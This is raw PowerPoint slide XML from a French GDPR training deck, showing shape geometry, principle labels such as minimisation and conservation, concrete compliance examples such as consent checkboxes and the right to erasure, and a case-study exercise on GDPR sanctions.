                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{967A3851-D55E-4BD0-86A8-B58D19391E0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="6273311" y="5157524"/>
            <a:ext cx="5930089" cy="1294485"/>
            <a:chOff x="0" y="1409269"/>
            <a:chExt cx="5918688" cy="1303498"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="2AB59F"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Rectangle 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9295E1A9-6122-45A8-8DF6-3454A7E9B71F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="1409269"/>
              <a:ext cx="4030249" cy="654374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="76ABDC"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="76A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23" name="Arrow: Left 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284A3967-46D0-4B25-B3A2-162701810CB2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="13391102">
              <a:off x="3010476" y="1615009"/>
              <a:ext cx="2908212" cy="1097758"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY3" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2216226"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2216226"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2216226"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY0" fmla="*/ 548879 h 1097758"/>
                <a:gd name="connsiteX1" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1097758"/>
                <a:gd name="connsiteX2" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY2" fmla="*/ 226725 h 1097758"/>
                <a:gd name="connsiteX3" fmla="*/ 2908212 w 2908212"/>
                <a:gd name="connsiteY3" fmla="*/ 221698 h 1097758"/>
                <a:gd name="connsiteX4" fmla="*/ 2216226 w 2908212"/>
                <a:gd name="connsiteY4" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX5" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY5" fmla="*/ 871033 h 1097758"/>
                <a:gd name="connsiteX6" fmla="*/ 859007 w 2908212"/>
                <a:gd name="connsiteY6" fmla="*/ 1097758 h 1097758"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2908212"/>
                <a:gd name="connsiteY7" fmla="*/ 548879 h 109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8212" h="1097758">
                  <a:moveTo>
                    <a:pt x="0" y="548879"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="859007" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="226725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2908212" y="221698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216226" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="871033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859007" y="1097758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="548879"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="B9D4ED"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B9D4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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F55D051-039E-4161-8196-D52352D165C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7534544" y="4877701"/>
            <a:ext cx="4501012" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seules les données nécessaires sont traitées</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEA88547-A2C4-4711-A197-8A53C05224B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154662" y="4877701"/>
            <a:ext cx="4224557" cy="702992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protection des données sensibles en cas de traitement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D97F495-561C-40F7-A61E-98E5E79A8AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175890" y="1503434"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Traitement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B223C031-1A9D-4E73-B6D3-B445CFA2E7C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8447762" y="1503434"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Conservation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{947BF3D4-D694-43BE-8AC2-29215C81B125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114936" y="5843045"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Protection et sécurité</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55FEF4D-A650-43E6-A0D1-30F2AF3EE318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8497926" y="5864254"/>
            <a:ext cx="3586032" cy="397343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="31506C"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans" panose="020B0502040504020204" pitchFamily="34"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Minimisation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Graphique 29" descr="Coche avec un remplissage uni">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B33539D-ADF2-4C18-A3A9-3C4DF2667E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44500" y="3429000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25331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4" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="2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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Principes de Protection des Données – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>EXEMPLES CONCRETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10691265" cy="4161462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Case de consentement pour un formulaire ou l’utilisateurs renseigne des données qui ont vocation à être stockées et utilisées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Bouton obligatoire de désinscription lors de l’envoie d’une newsletter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>La demande de suppression des infos en BDD (droit à l’oubli)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si le site en utilise : le consentement aux cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253818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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exercice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{462AB5B3-6E3D-4837-936D-030D40E80169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10890731" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Réalisez une étude de cas en vous inspirant des sujets suivants :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blockproof.fr/blog/sanctions-rgpd-entreprises-pays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Objectif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Recensez et expliquez les erreurs réalisées par ces entreprises.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Proposez des solutions permettant de pallier les erreurs, d’éviter les sanctions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21B7ED6E-017F-4C88-865C-407E7AD3F8F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41740303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2248A1-667E-45CD-B09A-8E8D82E3F9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>WOOCLAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Espace réservé du contenu 5" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B6F87E8-14AA-BDDA-2B50-92101C83DE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2352" y="1607611"/>
            <a:ext cx="10559548" cy="4868196"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
